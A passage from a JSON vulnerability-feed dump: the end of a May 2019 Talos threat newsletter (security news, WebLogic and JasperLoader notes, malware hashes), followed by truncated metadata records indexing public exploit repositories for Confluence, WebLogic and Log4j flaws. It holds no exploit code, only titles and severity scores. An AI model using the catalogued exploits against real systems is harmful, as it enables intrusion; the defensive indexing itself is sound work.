Conference](<https://www.cyberhagen.com/event/39cd5ea8-2155-4d38-8128-34b457dc0e98/websitePage:645d57e4-75eb-4769-b2c0-f201a0bfc6ce?5S%2CM3%2C39cd5ea8-2155-4d38-8128-34b457dc0e98=>)\n\n**Location:** Industriens Hus, Copenhagen, Denmark\n\n**Date:** May 29\n\n**Speaker:** Paul Rascagn\u00e8res\n\n**Synopsis:** Paul will give an overview of an espionage campaign targeting the Middle East that we called \u201cDNSpionage.\u201d First, he will go over the malware and its targets and then talk about the process the attackers took to direct DNSs. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security.\n\n### Cyber Security Week in Review\n\n * Cisco disclosed a [critical vulnerability in the Nexus 9000 Series Application Centric Infrastructure (ACI) ](<https://www.networkworld.com/article/3392858/cisco-issues-critical-security-warning-for-nexus-data-center-switches.html>)Mode data-center switch that could allow an attacker to secretly access system-level resources. The company disclosed 39 other bugs, as well, on Thursday.\n * The latest version of Google Chrome [fixed two vulnerabilities](<https://news.softpedia.com/news/google-releases-chrome-74-update-with-critical-security-fixes-525831.shtml>) in the web browser. One is considered to be of \u201chigh\u201d severity: An out-of-bounds vulnerability in SQLite.\n * Citrix says attackers were able to obtain persistence on their systems for about six months and may have [stolen employees\u2019 personal data](<https://www.zdnet.com/article/hackers-lurked-in-citrix-systems-for-six-months/?utm_source=newsletter&utm_medium=email&utm_campaign=newsletter_axioscodebook&stream=technology>). The software company says the breadth of the attack is not yet known but could involve stolen Social Security numbers, names and financial information.\n * Financial data from several large companies were [leaked online](<https://nakedsecurity.sophos.com/2019/05/02/extortionists-leak-data-of-huge-firms-after-it-provider-refuses-to-pay/?utm_source=newsletter&utm_medium=email&utm_campaign=newsletter_axioscodebook&stream=technology>) after a technology company refused to pay a ransom. German IT provider Citycomp had data stolen in an attack, including information on Oracle, Porsche and Toshiba.\n * Magecart launched a [renewed attack on OpenCart websites](<https://www.bleepingcomputer.com/news/security/magecart-group-12-targets-opencart-websites/>). The credit card-stealing malware is going after the e-commerce platform, which is one of the three most popular shopping interfaces for sites to use. \n * Slack warned potential investors that it could be the [target of a nation-state-backed cyber attack](<https://securityboulevard.com/2019/04/slack-to-investors-we-might-be-the-target-of-organized-crime-nation-sponsored-hackers/>). The group messaging platform revealed the ongoing threats ahead of its expected IPO.\n * An exposed database [holds sensitive information](<https://www.engadget.com/2019/04/29/database-exposes-80-million-us-households/>) on more than 80 million American households \u2014 but no one seems to know who owns it.\n * Apple [removed several parental control apps](<https://www.securityweek.com/apple-claims-parental-control-apps-removed-due-use-mdm>) from its store. The company said the programs were utilizing illicit, \u201chighly invasive\u201d mobile device management techniques.\n * Norwegian aluminum maker Norsk Hydro estimates a recent ransomware attack [cost the company the equivalent of $52 million](<https://www.reuters.com/article/norsk-hydro-outlook/update-1-norsk-hydro-expects-cyber-attack-costs-of-nearly-52-mln-in-q1-idUSL5N22C12R>) in the first quarter. \n\n### Notable recent security issues\n\n**Title: **[Oracle vulnerability opens users to remote code execution attacks](<https://www.zdnet.com/article/new-oracle-weblogic-zero-day-discovered-in-the-wild/>) \n**Description: **Oracle released an out-of-band pouch for WebLogic servers that could allow an attacker to carry out remote code execution attacks. Security researchers discovered the bug being exploited earlier this month by attackers in the wild. Oracle assigned the bug CVE-2019-2725 and gave it a CVSS score of 9.8/10, highlighting how serious the issue is. WebLogix server owners are urged to update as soon as possible. \n\n\n**Snort SIDs:** 49942, 49943\n\n \n\n\n**Title:** _[JasperLoader targets Europe with Gootkit banking trojan](<https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html>)_ \n**Description: **A loader known as \"JasperLoader\" has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries, with a particular focus on Germany and Italy. JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process. \n**Snort SIDs:** 49914, 49915\n\n### Most prevalent malware files this week\n\n**SHA 256:** [3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/#/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5:** 47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename:** qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name:** Win.Trojan.Generic::in10.talos \n \n**SHA 256:** [7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510](<https://www.virustotal.com/#/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details>) \n**MD5:** 4a50780ddb3db16ebab57b0ca42da0fb \n**Typical Filename: **xme64-2141.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.7ACF71AFA8-95.SBX.TG \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/#/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **Tempmf582901854.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n \n**SHA 256:** [15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/#/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5:** 799b30f47060ca05d80ece53866e01cc \n**Typical Filename:** 799b30f47060ca05d80ece53866e01cc.vir \n**Claimed Product:** N/A \n**Detection Name: **W32.Generic:Gen.21ij.1201 \n \n**SHA 256:** [d05a8eaf45675b2e0cd6224723ededa92c8bb9515ec801b8b11ad770e9e1e7ed](<https://www.virustotal.com/#/file/d05a8eaf45675b2e0cd6224723ededa92c8bb9515ec801b8b11ad770e9e1e7ed/details>) \n**MD5:** 6372f770cddb40efefc57136930f4eb7 \n**Typical Filename:** maftask.zip \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Gt32supportgeeks::tpd \n\n\n \n\n\n", "cvss3": {}, "published": "2019-05-02T11:00:01", "type": "talosblog", "title": "Threat Source (May 2, 2019)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-02T11:00:01", "id": "TALOSBLOG:E398382645C9465F51D4AC68FBE13C7B", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/U2AnuIUndfA/threat-source-may-2-2019.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "githubexploit": [{"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-29T23:35:43", "description": "# CVE-2019-2725\nWebLogic Universal Exploit - CVE-2017-3506 / CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T01:42:57", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2017-10271", "CVE-2017-3506"], "modified": "2021-12-29T12:52:27", "id": "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:45:54", "description": "# CVE-2021-26084\nThis i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-02T07:05:23", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T07:07:25", "id": "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-13T21:41:32", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-13T09:42:12", "description": "# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injectio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T23:33:44", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-13T08:40:52", "id": "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:49:37", "description": "# CVE-2021-26084_PoC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-18T07:33:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-01T09:03:37", "id": "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:51:44", "description": "# CVE-2021-26084 patch \n\n CVE-2021-26084 patch provided by \"Co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-08T17:05:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-08T17:29:07", "id": "84D5F04A-0DDB-5788-8759-DA99D303B756", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:53:20", "description": "# CVE-2021-26084\nProof of concept for CVE-2021-26084. \n\nConfluen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T15:19:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-25T14:48:53", "id": "BFA4DC64-759A-5113-842C-923C98D12B44", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:58", "description": "# confluence-rce-poc\nSetting up ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-04T14:53:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-04T15:16:43", "id": "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:43", "description": "# CVE-2021-26084\n\n- An OGNL injection vulnerability exists that ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 